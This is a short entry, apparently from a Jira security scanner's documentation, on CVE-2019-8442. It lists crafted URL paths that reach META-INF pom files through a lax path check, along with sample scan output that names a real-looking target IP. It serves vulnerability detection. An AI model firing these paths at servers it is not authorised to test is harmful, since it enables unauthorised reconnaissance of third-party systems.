CVE-2019-8442

Category: [Info Disclosure]

[CG] I haven't found any interesting info in any of these pom.xml files but YMMV

module name: check_cve_2019_8442

url:

/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

INFO: Checking for CVE-2019-8442

- Checking URL: https://jiraserver/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- HTTP Status Code: 200

- Checking URL: https://jiraserver/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- HTTP Status Code: 200

- Checking URL: https://jiraserver/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
- HTTP Status Code: 200
- NEEDS MANUAL REVIEW - No sensitive information detected at https://5.188.139.179/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

References: https://jira.atlassian.com/browse/JRASERVER-69241

Description

The CachingResourceDownloadRewriteRule class in Jira

• before version 7.13.4
• and from version 8.0.0 before version 8.0.4
• and from version 8.1.0 before version 8.1.1

allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.